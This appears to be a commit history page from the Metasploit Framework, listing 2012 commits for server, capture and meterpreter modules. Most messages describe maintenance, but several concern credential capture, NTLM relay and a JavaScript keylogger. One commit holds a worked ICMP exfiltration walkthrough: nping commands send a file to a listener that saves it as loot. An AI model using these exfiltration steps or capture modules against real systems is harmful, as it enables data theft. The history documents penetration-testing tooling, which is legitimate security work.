Commit Graph

401 Commits (8f2e444aca057869d1d42c317aadebf7201d0917)

Author SHA1 Message Date
Patrik Karlsson 4859e0809e add missing username to john hash 2012-07-16 09:14:44 +02:00
HD Moore 10db74d480 Show the IP address in the output 2012-07-15 21:35:43 -05:00
Patrik Karlsson 8889d89eea msftidy cleanup 2012-07-16 02:07:45 +02:00
Patrik Karlsson 6331c33472 add MySQL password capturing module
This module provides a fake MySQL service that is designed to
capture authentication credentials. It captures	challenge and
response pairs that can be supplied to Cain or JTR for
cracking.
2012-07-16 01:55:22 +02:00
HD Moore 6cdd044e10 Remove a buggy payload that doesn't have NX support 2012-07-12 12:15:57 -05:00
webstersprodigy fd009fe3ff Improved smb_put reliability
The .write function was having issues with large files, the
connection would close or sometimes there would be errors.
I changed thefunction to act more like smb_relay and it works better.
2012-07-11 23:30:55 -04:00
jvazquez-r7 b12f13f837 Review of Pull request #594 2012-07-12 00:46:24 +02:00
jvazquez-r7 16cd847e5a Merge branch 'mssql_review' of https://github.com/jvazquez-r7/metasploit-framework into jvazquez-r7-mssql_review 2012-07-12 00:36:54 +02:00
jvazquez-r7 a840ff8cf8 Review of pull request #598 2012-07-12 00:34:17 +02:00
jvazquez-r7 f933d98d38 Review of #595 2012-07-12 00:19:27 +02:00
webstersprodigy c593a3429d fixed a type bug with the default response 2012-07-11 02:23:37 -04:00
webstersprodigy f50843e0b7 Adding http_ntlmrelay module 2012-07-09 22:56:24 -04:00
sinn3r 87bac91d71 Apply additional changes from #549
From pull request #549. Changes include:
* Use OptEnum to enforce the use of wpad.dat or proxy.pac
* Remove cli.peerhost:cli.peerport, the API does that already
* cleanup function to restore uripath datastore option
* More friendly error when the user doesn't have enough permission
  to bind to port 80, that way they don't blame it's a bug on msf.
* Remove unnecessary SVN stuff in modinfo
2012-07-07 15:59:16 -05:00
sinn3r 4e90da002d Merge branch 'master' of https://github.com/efraintorres/wmap-metasploit into wpad 2012-07-07 15:44:05 -05:00
efraintorres 4c68cdd584 Actions removed. 2012-07-02 10:57:32 -05:00
efraintorres be666fde89 Full msftidy compliant 2012-06-30 22:08:10 -05:00
efraintorres cad749d495 More formatting. 2012-06-30 21:21:56 -05:00
efraintorres 22b47e32fe Fixed wrapping of module description 2012-06-30 21:12:01 -05:00
efraintorres f8aacc3482 All fixes applied to wpad module. 2012-06-30 20:57:59 -05:00
HD Moore 1989f0ab46 IE 10/Win8 detection support 2012-06-25 00:36:04 -05:00
Rob Fuller 77022d10da Added a bit of verbosity to SMB capture module to enhance logging and post exploitation 2012-06-18 15:55:40 -03:00
sinn3r 3f0431cf51 Massive whitespace destruction
Remove whitespace found at the end of the line
2012-06-06 00:36:17 -05:00
sinn3r c30af98b53 Massive whitespace destruction
Remove all the lines that have nothing but whitespace
2012-06-06 00:22:36 -05:00
Chris John Riley d48da6741a altered spaces to tabs
added basic check to avoid saving empty files to loot
2012-06-03 08:48:47 +02:00
jlee-r7 fe7928c18d Merge pull request #390 from jlee-r7/consolidate-250-254-375
Consolidate #250, #254, #375
2012-05-16 17:07:33 -07:00
HD Moore 4943b4c694 Bug fix from mubix (ruby 1.8 syntax) 2012-05-15 23:05:22 -05:00
James Lee 42719ab34b Squashed commit of the following:
commit 6a3ad1d887df9d277e4878de94f8700ed8e404f9
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 16:22:49 2012 -0600

    Add register_command calls for md5 and sha1

commit dbd52c5a1edfe1818a580d4d46aac0a9ca038e9c
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 16:22:09 2012 -0600

    Read the file instead of downloading it

commit 55b84ad8e2a8532b3f8520ccb1162169b8e9c056
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 15:27:11 2012 -0600

    Re-compile linux meterp to support the loadlib api

commit d112e84e490aa30aa9533fb0bdb33a9713ce01a5
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 14:50:25 2012 -0600

    Re-compile java meterp to support the loadlib api

commit c137187b346b708487245a849b95343223e4e7b0
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 14:44:10 2012 -0600

    Don't try to get interfaces if this session doesn't implement it

commit 88bba1e6c360c5725c4174623f56bcb6d8b54228
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 14:38:17 2012 -0600

    Remove debugging load

commit 02954cbf93e2a13da967780cb703103b3f83ecf4
Merge: d9ef256 88b35a3
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 12:06:53 2012 -0600

    Merge branch 'rapid7' into feature/4905

    Conflicts:
    	data/meterpreter/ext_server_stdapi.php
    	modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb

commit d9ef2569b88ae8bce67f13316f6eff76311fd846
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 2 18:06:06 2012 -0600

    PHP doesn't support rev2self

commit bf13ea0ff25541da07b8c099218e5ad7ea6ae8ba
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 18:21:59 2012 -0600

    Add php support for returning new extension commands

commit 7e35f2d671d3797fc3fab12e54015387f44b0b33
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 16:03:26 2012 -0600

    Reset CVE-2012-0507 back to master

    Purges commits unrelated to this branch.

commit 86a77b3cd017e1e3a3f23d9fba3b9ed173761f80
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 15:59:35 2012 -0600

    Revert "Make building the jar for cve-2012-0507 a bit easier"

    This reverts commit 27ef76522ad10436ec785728445ed2cc0657f85f.

    Conflicts:

    	external/source/exploits/CVE-2012-0507/Makefile
    	external/source/exploits/CVE-2012-0507/src/msf/x/PayloadX.java

commit 8c259fb779f736be16fe972215ddff1dd32fd0f3
Merge: fe2c273 1c03c2b
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 15:35:44 2012 -0600

    Merge branch 'rapid7' into feature/4905

    Conflicts:
    	data/meterpreter/ext_server_stdapi.jar
    	data/meterpreter/meterpreter.jar
    	external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
    	modules/auxiliary/server/browser_autopwn.rb

commit fe2c273a6d840c67040d6c9e337f908204337e18
Merge: 8caff47 4e955e5
Author: James Lee <egypt@metasploit.com>
Date:   Fri Apr 6 10:19:53 2012 -0600

    Merge branch 'rapid7' into feature/4905

commit 8caff47d97469f1a5459c04461fd1098487ea514
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 17:51:18 2012 -0600

    Fix requires to find the test library

commit 51c33574cee3c47f0b2900c388d3d1213dd0a90d
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 17:48:35 2012 -0600

    Fix a load order problem with solaris post mods

commit 81b658362e5e6bdd215d18b53d14429d163aff72
Merge: adad2cf 6ef4257
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 15:43:19 2012 -0600

    Merge branch 'master' into feature/4905

commit 6ef42579471c6fde4bba71d0d4ce2c6c3e836180
Merge: 70ab8c0 5852455
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 15:16:56 2012 -0600

    Merge branch 'rapid7'

    Conflicts:
    	lib/rex/exploitation/javascriptosdetect.rb

commit adad2cf04c501c2a787e5475b62abd31871c06a0
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 20:20:21 2012 -0600

    Deal with null data/jar

    Not sure why "" turns into null sometimes, but it was breaking shells;
    this fixes it.

commit 4f8a437b490e2b2774f9efd23b4891eaf007cf16
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:10:59 2012 -0600

    Prev commit moved these to src/a

commit 27ef76522ad10436ec785728445ed2cc0657f85f
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:08:32 2012 -0600

    Make building the jar for cve-2012-0507 a bit easier

    Mostly stolen from cve-2008-5353

commit db3dbad0a5ff20b05758be073c3502138ff095c2
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 14:52:23 2012 -0600

    Fix incorrect option name

commit 776976af31795bdf1b405e208a2d4b78a6b6c2cf
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:36:20 2012 -0600

    Add bap support to java_rhino

commit a611ab16e06bd324d6616d0bd69f2c09d671bca0
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:35:16 2012 -0600

    Put next_exploit on the window object so it's always in scope

    Solves some issues with Chrome not running more than one exploit

commit 5114d35de7c2f234ac7fe4288b344d4f2bb9731f
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 14:31:53 2012 -0600

    Pull common stuff up out of the body

commit 748309465a029593e2fe2fd445149745367513f4
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:04:03 2012 -0600

    Fix indentation level

commit 954d485e3b8ffea9a7451bd495c1956a098e0eda
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:02:42 2012 -0600

    Abstract out copy-pasted methods

    Need to do the same thing for OSX, but it's a different implementation.

commit cba8d7c911fb184f6358948022fd4a0e010878d0
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 23 18:04:50 2012 -0600

    Linux doesn't implement (drop|steal)_token

commit 1cfda3a7b045c08ecfae1ad688e0124e76bd0c8f
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 23 17:57:37 2012 -0600

    Add availability checks for net, sys, ui, and webcam

commit 4bdf39a8bf4b5aab293fc47cb8282d0346db0811
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 23 16:45:59 2012 -0600

    add requirement checking for fs and core commands

commit 42e35971c9f7348b57293b2b94a42dd0260ac7e4
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 21 17:20:59 2012 -0600

    Add a to_octal method that converts e.g. "A" to \0101

commit c3b9415a0a9e2b55b1effbaf2396e11f88301aaa
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 21 17:20:07 2012 -0600

    Don't use "echo -n"

    It's not portable

commit b0f3ceccfaedbeaf67fbbe76f1a0a9aec7b44548
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 20 17:01:10 2012 -0600

    Return a list of new commands after core_loadlib, java version

    Thanks mihi for the patch and the awesome responsiveness!

commit d65303e1b6458bd4b95138dc0d61e5354c4e8d3a
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 20 13:21:06 2012 -0600

    Make sure we have a response before doing stuff with it

commit 721001ead474a17d1a16de543f78b548879f5e7e
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 21:25:31 2012 -0600

    Add missing rmdir and mkdir protocol commands to PHP

    Now passes all the stdapi tests that it can
    	[*] Session type is meterpreter and platform is php/php
    	[+] should return a user id
    	[+] should return a sysinfo Hash
    	[-] FAILED: should return network interfaces
    	[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
    	[-] FAILED: should have an interface that matches session_host
    	[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
    	[-] FAILED: should return network routes
    	[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: 1
    	[+] should return the proper directory separator
    	[+] should return the current working directory
    	[+] should list files in the current directory
    	[+] should stat a directory
    	[+] should create and remove a dir
    	[+] should change directories
    	[+] should create and remove files
    	[+] should upload a file
    	[-] Passed: 10; Failed: 3

commit 024e99167a025f4678a707e1ee809a1524007d4d
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 15:26:00 2012 -0600

    Use a proper TLV type instead of a generic one

commit 1836d915cbe0bfd2f536a667e74d8d6a6ccee72a
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 15:24:25 2012 -0600

    Fix a counting error that caused segfaults (Linux)

commit 1e419d3fc392e435ae0af703561ce10bd5a45eb0
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 15:06:02 2012 -0600

    Return a list of new commands after core_loadlib

    Gets Windows back in sync with Linux

commit 3d3959f720de68e2f36ebfabe8196e01f98fe904
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 14:50:55 2012 -0600

    Refactor extensionList -> extension_commands

    It's not the same as extension_list.

commit a7acb638af803732fc5f3975e0c0632f427e0deb
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sun Mar 18 00:07:27 2012 -0500

    Massive whitespace cleanup

commit ef8b9fd5cea7db43860a5b88d7397ba84393ecd5
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 16:00:20 2012 -0500

    Add back enum_protections with some new changes

commit d778eec36953bb9bf4985e967ad2c119a1acd79b
Author: ohdae <bindshell@live.com>
Date:   Sat Mar 17 13:28:31 2012 -0400

    Added fix for enum_protections

commit 64611819d43bf13ab2d68f4353513c39e5a64fe0
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 03:14:26 2012 -0500

    A bunch of fixes

commit bb1a0205d73e75a61a8fbf5ff6440dd09f9780f9
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 00:28:05 2012 -0500

    The comments in get_chatlogs need an update

commit 666477e42a734f3120dcc4282b01b5ab5819384a
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 00:25:41 2012 -0500

    Correct license format

commit 3c8eecbcd7b952abaca0b1ce14dca41e1d4cabb7
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 00:22:03 2012 -0500

    Add enum_adium.rb post module

commit d290cf4fef1309df9a1af748e7c6c259a6788576
Author: ohdae <bindshell@live.com>
Date:   Fri Mar 16 16:54:36 2012 -0300

    Changed store_note to store_loot. Fixed local/remote file retrieval

commit ccb830b594ea0f0a8ce7c29b24f2f137ecfd5c4c
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 16 11:29:07 2012 -0600

    Fall back to MIB method if we can't get netmasks

    Misses IPv6 addresses, but at least doesn't break everything.

    [Fixes #6525]

commit a9a30232dd5fcc0854c10b4d58df8511a23f3091
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Fri Mar 16 11:49:31 2012 -0500

    This module is not ready, yanked.

commit 6bb34f7fd0785d31902f1edc938a6b05b91a1495
Author: Gregory Man <man.gregory@gmail.com>
Date:   Fri Mar 16 18:09:08 2012 +0200

    sockso_traversal 1.8 compatibility fix

commit e76965ce565a8ae634dc0d3c743542f1a6d977d7
Author: ohdae <bindshell@live.com>
Date:   Fri Mar 16 09:17:35 2012 -0400

    fix

commit 61ce7b587de54363f7071bc19df5a29eb29e9aa7
Author: ohdae <bindshell@live.com>
Date:   Fri Mar 16 09:14:48 2012 -0400

    saves each config to loot instead of notes

commit f4713974fa82d8b13017cb0817b5fd36696194d9
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 16 03:46:10 2012 -0600

    Check for a 0 prefix length

    If the OnLinkPrefixLength is 0, something is wrong, try the value in the
    prefix linked list.  Appears to fix v4 addresses on XP but not 2k3.

    [See #6525]

commit cde7fcc012e04880f2faa28226a1fc5834a2e3d5
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 16 01:46:41 2012 -0600

    Return network prefixes when available

    Solves #6525 on Vista+.  Win2k still works using the old MIB method
    (which doesn't support ipv6).  Win2k3 and XP are still busted for
    unknown reasons.

commit 98bd9a7bd09149f524ebbe1501ec916bf99b078d
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 22:59:42 2012 -0400

    Enumerate important and interesting configuration files

commit 9336df2ac28ee2df10a0e66e7006df3d23493492
Author: David Maloney <David_Maloney@rapid7.com>
Date:   Thu Mar 15 19:06:48 2012 -0500

    More Virtualisation SSL fixes

commit f24c378281ee6c85f687d4823f09ef5848812daf
Author: David Maloney <David_Maloney@rapid7.com>
Date:   Thu Mar 15 18:15:29 2012 -0500

    Default SSL to true for esx_fingerprint module

commit d6e14c42120df0fd16b79709ac5723d0e2818810
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 15:56:24 2012 -0500

    Fix typo

commit b24dcfe43e625740ec8a1465f33be02f7ec40162
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 15:55:54 2012 -0500

    Add sockso dir traversal

commit 033052c1e075fcf43e9c17e5ee4a5006247cb375
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 15 14:31:25 2012 -0600

    Fix syntax error in 1.8, thanks Jun Koi for the patch

commit 4529efaeaa22e52c9c7c1528c68efb60af8af729
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 14:27:40 2012 -0500

    enum_protections is now find_apps

commit 49e823802bd8f2cb1940545e74db04f3788352d1
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 14:22:23 2012 -0500

    File rename, as well as design and cosmetic changes

commit ccf6b011145cf9db444f7e2d3fb3ec61738e88cb
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 15:29:52 2012 -0300

    added report_note, removed store_loot function, cleaned up info/author

commit 27d571932e51afbac0c0fcd95c52f038786a9a28
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 12:18:29 2012 -0300

    fixed output newline issue

commit 5a828e35d1629dc68825fe7d9322d1316888f8d7
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 01:05:35 2012 -0300

    fixed save line

commit 805c2ee9871c076a8c0ac62b028a7942af70b6a5
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 01:02:07 2012 -0300

    removed unneeded comments

commit 5861e1512f2949c0d7848d9ebed8241277462085
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 01:00:55 2012 -0300

    fixed output issue

commit 593a3648111f1db1f56a410250539261c2a7cd9f
Author: ohdae <bindshell@live.com>
Date:   Wed Mar 14 18:26:53 2012 -0300

    removed unneeded dependency

commit 05053e6e74b0ac99bbd4005c40ecc3b1196fd13f
Author: ohdae <bindshell@live.com>
Date:   Wed Mar 14 13:30:16 2012 -0400

    locates installed 3rd part av, fws, etc

commit 5bf512d0e9d2b412c4107228db178a7078111443
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Wed Mar 14 16:50:54 2012 -0500

    Add OSVDB-79863 NetDecision Directory Traversal

commit 18715d0367f4ef01b5998d732043cbe224e1787e
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 23:03:01 2012 -0600

    Store the retrieved commands on the session

commit b752cb8b31fd8dcd221fb6caa483f6202bf5a4fd
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 22:45:16 2012 -0600

    Retrieve the list of new commands

    The client side doesn't do anything with them yet

commit 69ce8ef42d4089a0b26644bd4d6bebf57c4cfd50
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 22:41:16 2012 -0600

    Return a list of the new commands in response to core_loadlib

    Linux

commit 354c754aa4cce63ffebb4567f3bbfd621ffef46c
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 15:13:45 2012 -0600

    Whitespace at EOL

commit 4afcb4cb9da1921ede29b03b149433cc65d680da
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 14:30:09 2012 -0600

    Create instance methods that return extensions

    Before this change, meterpreter sessions would not #respond_to? their
    extensions despite having a pseudo-accessor for them:
    ```
    >> client.respond_to? :sys
    => false
    >> client.sys
    => #<Rex::Post::Meterpreter::ObjectAliases:0x0000000e263488 @aliases={"config"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config:0x0000000e268dc8 @client=#<Session:meterpreter 192.168.99.1:55882 (192.168.99.1) "uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ wpad">>, "process"=>#<Class:0x0000000e268d20>, "registry"=>#<Class:0x0000000e266da0>, "eventlog"=>#<Class:0x0000000e2654e8>, "power"=>#<Class:0x0000000e263c30>}>

    ```

    After:
    ```
    >> client.respond_to? :sys
    => true
    ```

commit 70ab8c018f67d15929b6f41322540837ab7b37c5
Merge: a8a3938 5f2bace
Author: James Lee <egypt@metasploit.com>
Date:   Tue Apr 3 11:46:25 2012 -0600

    Merge branch 'master' into bap-refactor

    Conflicts:
    	external/source/exploits/CVE-2012-0507/Help.java
    	external/source/exploits/CVE-2012-0507/Makefile
    	external/source/exploits/CVE-2012-0507/msf/x/Help.java
    	external/source/exploits/CVE-2012-0507/src/a/Exploit.java
    	external/source/exploits/CVE-2012-0507/src/a/Help.java

commit a8a393891588a8b5c18e3c2173f1cd9c2480b2d0
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 20:20:21 2012 -0600

    Deal with null data/jar

    Not sure why "" turns into null sometimes, but it was breaking shells;
    this fixes it.

commit 5e5eb39d3ccb62a9fc006be8241cfb97723caa06
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:10:59 2012 -0600

    Prev commit moved these to src/a

commit 5074eadbea426fc4f83d6d165a01e640ef42b4de
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:08:32 2012 -0600

    Make building the jar for cve-2012-0507 a bit easier

    Mostly stolen from cve-2008-5353

commit bdb3fbe7fd19aa76b4069edca5a78c53fec668c0
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 14:52:23 2012 -0600

    Fix incorrect option name

commit 78824ef60084510d3befe0ded6eed314d55eeb12
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 13:24:33 2012 -0600

    Add the detected browser version to the DOM

    Doing it this way lets modules grab the info a bit more easily.

commit 9813ccb8d6b14e0e728b8a13bacf59dd31b9c4b9
Merge: 0faa3f6 b5fc8e4
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 13:19:05 2012 -0600

    Merge branch 'master' into bap-refactor

commit 0faa3f65240c3a2b3ab0e72f4aeb2e9f50ed54ee
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:36:20 2012 -0600

    Add bap support to java_rhino

commit 66ca27f994e3b11c9c8adae85642820768158860
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:35:16 2012 -0600

    Put next_exploit on the window object so it's always in scope

    Solves some issues with Chrome not running more than one exploit

commit 7fc2ca1a0690c7a973307772aed42ab3514e1761
Merge: 325d306 e48c47e
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:10:54 2012 -0600

    Merge branch 'master' into bap-refactor

commit 325d3060599bc79674e93dd5f55a4e60061e9bdb
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 14:31:53 2012 -0600

    Pull common stuff up out of the body

commit 4f2b3260bf7f14f4d763625792adb0c3cfd1ed7c
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:04:03 2012 -0600

    Fix indentation level

commit 9b905c53b4d46beb86da8168a1c2c5b2da340f6d
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:02:42 2012 -0600

    Abstract out copy-pasted methods

    Need to do the same thing for OSX, but it's a different implementation.
2012-05-15 17:00:02 -06:00
Tod Beardsley bc1c9a7fe4 Prepend all messages with victim host:port
Redefining print_status locally to handle this. Seems like an easy way
to do this kind of thing for a particular module.

[Closes #272]
2012-05-11 17:48:54 -05:00
Tod Beardsley ab655677b4 Fixed typo, converted to OptEnum for fakedns targetaction 2012-05-11 17:12:31 -05:00
Jose Selvi af71cdafe2 Update modules/auxiliary/server/fakedns.rb 2012-05-11 17:01:14 -05:00
Jose Selvi 1d6b2eb3fe Added TARGETACTION options and wildcard support 2012-05-11 17:01:13 -05:00
sinn3r f77efbf89e Change the rest of print_* 2012-04-25 14:24:17 -05:00
James Lee 1f577b24b2 Merge branch 'rapid7' into http-print-standardization 2012-04-18 08:51:42 -06:00
James Lee a2dc890cfa Don't puke if the connection came from localhost 2012-04-17 19:49:42 -06:00
James Lee afe28523f3 Puts testAXO() on window so we can access it from anywhere
Also uses the new :method property which allows an array syntax.  See
ie_createobject for a usage example.
2012-04-17 18:54:26 -06:00
James Lee d0eb383655 Un-standardize printing in browser modules
This is now handled by the HttpServer mixin
2012-04-11 00:26:25 -06:00
James Lee b38933328f Send exploits that are not assocated with any browser to all of them 2012-04-09 01:53:57 -06:00
James Lee f520af036f Move next_exploit() onto window object so it's accessible everywhere
I swear I committed this before, not sure what happened.
2012-04-08 17:11:15 -06:00
Chris John Riley 8c3f707c93 ICMP Data Exfiltration Module
Tested with nping for data exfiltration (client-side script is suggested to get the full functionality out of the module).

Walkthrough

============
== Client ==
============

> nping --icmp 10.0.0.138 --data-string "BOF:test.txt" -c1

Starting Nping 0.5.61TEST5 ( http://nmap.org/nping ) at 2012-04-04 15:05 W. Europe Daylight Time
SENT (0.5860s) ICMP 10.0.0.148 > 10.0.0.138 Echo request (type=8/code=0) ttl=64 id=42953 iplen=40
RCVD (1.0580s) ICMP 10.0.0.138 > 10.0.0.148 Echo reply (type=0/code=0) ttl=32 id=3551 iplen=33

Max rtt: 13.000ms | Min rtt: 13.000ms | Avg rtt: 13.000ms
Raw packets sent: 1 (54B) | Rcvd: 1 (33B) | Lost: 0 (0.00%)
Tx time: 0.46000s | Tx bytes/s: 117.39 | Tx pkts/s: 2.17
Rx time: 1.46000s | Rx bytes/s: 22.60 | Rx pkts/s: 0.68
Nping done: 1 IP address pinged in 2.05 seconds

> nping --icmp 10.0.0.138 --data-string "test text...." -c1

Starting Nping 0.5.61TEST5 ( http://nmap.org/nping ) at 2012-04-04 15:05 W. Europe Daylight Time
SENT (0.6230s) ICMP 10.0.0.148 > 10.0.0.138 Echo request (type=8/code=0) ttl=64 id=38228 iplen=41
RCVD (1.0540s) ICMP 10.0.0.138 > 10.0.0.148 Echo reply (type=0/code=0) ttl=32 id=14168 iplen=33

Max rtt: 10.000ms | Min rtt: 10.000ms | Avg rtt: 10.000ms
Raw packets sent: 1 (55B) | Rcvd: 1 (33B) | Lost: 0 (0.00%)
Tx time: 0.42200s | Tx bytes/s: 130.33 | Tx pkts/s: 2.37
Rx time: 1.42200s | Rx bytes/s: 23.21 | Rx pkts/s: 0.70
Nping done: 1 IP address pinged in 2.04 seconds

> nping --icmp 10.0.0.138 --data-string " test text.... again" -c1

Starting Nping 0.5.61TEST5 ( http://nmap.org/nping ) at 2012-04-04 15:05 W. Europe Daylight Time
SENT (0.6260s) ICMP 10.0.0.148 > 10.0.0.138 Echo request (type=8/code=0) ttl=64 id=12163 iplen=48
RCVD (1.0580s) ICMP 10.0.0.138 > 10.0.0.148 Echo reply (type=0/code=0) ttl=32 id=60632 iplen=33

Max rtt: 12.000ms | Min rtt: 12.000ms | Avg rtt: 12.000ms
Raw packets sent: 1 (62B) | Rcvd: 1 (33B) | Lost: 0 (0.00%)
Tx time: 0.42100s | Tx bytes/s: 147.27 | Tx pkts/s: 2.38
Rx time: 1.42200s | Rx bytes/s: 23.21 | Rx pkts/s: 0.70
Nping done: 1 IP address pinged in 2.05 seconds

> nping --icmp 10.0.0.138 --data-string "EOF" -c1

Starting Nping 0.5.61TEST5 ( http://nmap.org/nping ) at 2012-04-04 15:06 W. Europe Daylight Time
SENT (0.6420s) ICMP 10.0.0.148 > 10.0.0.138 Echo request (type=8/code=0) ttl=64 id=30459 iplen=31
RCVD (1.0970s) ICMP 10.0.0.138 > 10.0.0.148 Echo reply (type=0/code=0) ttl=32 id=55188 iplen=33

Max rtt: 24.000ms | Min rtt: 24.000ms | Avg rtt: 24.000ms
Raw packets sent: 1 (45B) | Rcvd: 1 (33B) | Lost: 0 (0.00%)
Tx time: 0.43100s | Tx bytes/s: 104.41 | Tx pkts/s: 2.32
Rx time: 1.43100s | Rx bytes/s: 23.06 | Rx pkts/s: 0.70
Nping done: 1 IP address pinged in 2.07 seconds


============
== SERVER ==
============

msf  auxiliary(icmp_exfil) > rerun
[*] Reloading module...

[+] ICMP Listener started on eth0 (10.0.0.138). Monitoring for trigger packet containing ^BOF:
[*] 2012-04-04 15:05:31 +0200: SRC:10.0.0.148 ICMP (type 8 code 0) DST:10.0.0.138
[+] Beginning capture of test.txt data
[*] Received 18 bytes of data from 10.0.0.148
[*] Received 20 bytes of data from 10.0.0.148
[*] 38 bytes of data recevied in total
[+] End of File received. Saving test.txt to loot
[+] Incoming file test.txt saved to loot
[+] Loot filename: /root/.msf4/loot/20120404150603_default_10.0.0.138_icmp_exfil_340768.txt
[*] Stopping ICMP listener on eth0 (10.0.0.138)
[-] Auxiliary interrupted by the console user
[*] Auxiliary module execution completed
msf  auxiliary(icmp_exfil) > loot

Loot
====

host        service  type        name      content   info                    path
----        -------  ----        ----      -------   ----                    ----
10.0.0.138           icmp_exfil  test.txt  text/xml  ICMP Exfiltrated Data   /root/.msf4/loot/20120404150603_default_10.0.0.138_icmp_exfil_340768.txt
2012-04-06 13:45:10 +02:00
James Lee 40ab362e1c Store host details in the target cache
This allows us to maintain a connection between the client and the
operating system/host where it's running.

Also fixes a counting problem for modules actually started.
2012-04-05 01:33:07 -06:00
James Lee 0ddfa79a34 Move javascriptosdetect out to its own file
Allows editors to easily highlight correctly which makes editing a
little nicer. Also makes it easier to debug because line numbers are
only off by the length of the custom_js argument.
2012-04-04 17:07:17 -06:00
James Lee 6ad0f41479 Add the client to output 2012-04-03 18:27:16 -06:00
James Lee 893430894e Tell the user how many sploits we've picked 2012-04-03 18:22:56 -06:00
sinn3r aeb691bbee Massive whitespace cleanup 2012-03-18 00:07:27 -05:00
HD Moore 3fecda95be Fix 1.8 compatibility issue 2012-02-22 02:05:44 -06:00
James Lee 464cf7f65f Normalize service names
Downcases lots and standardizes a few.  Notably, modules that reported a
service name of "TNS" are now "oracle".  Modules that report http
now check for SSL and report https instead.

[Fixes #6437]
2012-02-21 22:59:20 -07:00
HD Moore bce1c08623 Update modules/auxiliary/server/capture/http_javascript_keylogger.rb 2012-02-21 04:46:56 -06:00
HD Moore 7c1d48d6aa Merge in MJC's javascript keylogger 2012-02-21 04:25:15 -06:00
